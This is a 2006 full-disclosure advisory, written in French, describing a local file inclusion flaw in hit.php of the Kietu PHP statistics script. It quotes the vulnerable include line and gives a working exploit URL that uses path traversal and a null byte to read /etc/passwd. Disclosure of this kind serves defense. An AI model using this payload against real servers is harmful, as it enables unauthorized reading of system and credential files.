Computer Security

Security Advisory: [Full-disclosure] Local File Inclusion : Kietu
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  iyzi Forum s1 b2 (tr) SQL Injection Vulnerability

  ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability

  [SA22075] Web-News "content_page"
File Inclusion Vulnerability

  [Full-disclosure] Remote File Include in syntaxCMS

From:cdg393 <cdg393_(at)_gmail.com>
Date:25.09.2006
Subject:[Full-disclosure] Local File Inclusion : Kietu

[::] Produit                 : Kietu

[::] Langage                 : PHP

[::] Description             : Kietu? est un script ecrit en PHP, qui
requiert une base de donnee mySQL, et qui vous permet de generer et
consulter les statistiques d'acces a votre site web.

[::] Site web officiel       : http://www.Kietu.net/

[::] Page vulnerable         : hit.php

[::] Faille de securite      : Local File Inclusion

[::] Code vulnerable         : ( Ligne 2 ) -> include_once
$url_hit.'class/kdetect.class.php';

[::] Exploitation            :
http://localhost/kietu/hit.php?url_hit=../../../../../etc/passwd%00

@ [::] Credit                  : Avis de securite par cdg393 ->
cdg393_gmail_com :)
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server